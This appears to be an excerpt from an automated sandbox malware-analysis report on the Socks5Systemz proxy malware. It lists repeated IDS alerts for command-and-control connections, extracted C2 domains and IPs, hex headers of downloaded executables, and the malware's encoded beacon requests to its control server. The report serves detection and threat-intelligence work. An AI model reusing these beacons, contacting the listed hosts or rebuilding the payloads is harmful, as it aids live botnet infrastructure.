            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49939 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49939 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49933 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49933 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49945 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49945 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49956 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49956 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49962 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49962 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49968 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49968 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49974 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49974 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49980 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49980 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49991 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49991 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49999 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49999 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50011 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50011 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50004 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50004 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50030 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50030 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50028 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50028 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50034 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50034 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50036 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50036 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50040 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50040 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50017 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50035 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50017 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50042 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50031 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50035 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50031 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50042 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50049 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50049 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50029 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50041 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50032 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50029 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50032 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50038 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50047 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50039 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50041 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50051 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50051 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50052 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50038 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50033 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50033 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50039 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50046 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50059 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50047 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50059 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50048 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50023 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50037 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50055 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50048 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50057 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50043 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50057 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50046 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50023 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50055 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50052 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50043 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50044 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50044 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50045 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50045 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50056 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50056 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50054 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50037 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50050 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50050 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50054 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50058 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50058 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50060 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50060 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50061 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50061 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50053 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50053 -> 185.208.158.202:80
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: boietuj.com
            Source: Malware configuration extractorIPs: 185.156.72.65
            Source: Malware configuration extractorIPs: 185.156.72.65
            Source: Malware configuration extractorIPs: 185.156.72.65
            Source: Malware configuration extractorIPs: 185.156.72.65
            Source: global trafficTCP traffic: 192.168.2.4:49864 -> 89.105.201.183:2023
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 04:02:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="ONE.file";Content-Length: 4065622Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 b4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 04:02:25 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="PAB1.file";Content-Length: 4608Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 07 c8 de 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 08 00 00 00 08 00 00 00 00 00 00 de 26 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 26 00 00 4f 00 00 00 00 40 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 ec 25 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 06 00 00 00 20 00 00 00 08 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 40 00 00 00 06 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 00 00 00 00 00 00 48 00 00 00 02 00 05 00 5c 20 00 00 90 05 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 02 28 0f 00 00 0a 2a 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 c0 01 00 00 23 7e 00 00 2c 02 00 00 48 02 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 74 04 00 00 04 00 00 00 23 55 53 00 78 04 00 00 10 00 00 00 23 47 55 49 44 00 00 00 88 04 00 00 08 01 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 47 15 00 00 09 00 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 10 00 00 00 02 00 00 00 02 00 00 00 01 00 00 00 0f 00 00 00 0e 00 00 00 01 00 00 00 01 00 00 00 00 00 78 01 01 00 00 00 00 00 06 00 ed 00 0c 02 06 00 5a 01 0c 02 06 00 21 00 da 01 0f 00 2c 02 00 00 06 00 49 00 b6 01 06 00 d0 00 b6 01 06 00 b1 00 b6 01 06 00 41 01 b6 01 06 00 0d 01 b6 01 06 00 26 01 b6 01 06 00 60 00 b6 01 06 00 35 00 ed 01 06 00 13 00 ed 01 06 00 94 00 b6 01 06 00 7b 00 88 01 06 00 40 02 aa 01 00 00 00 00 01 00 00 00 00 00 01 00 01 00 00 00 10 00 a2 01 c8 01 41 00 01 00 01 00 50 20 00 00
            Source: Joe Sandbox ViewIP Address: 185.208.158.202 185.208.158.202
            Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
            Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
            Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
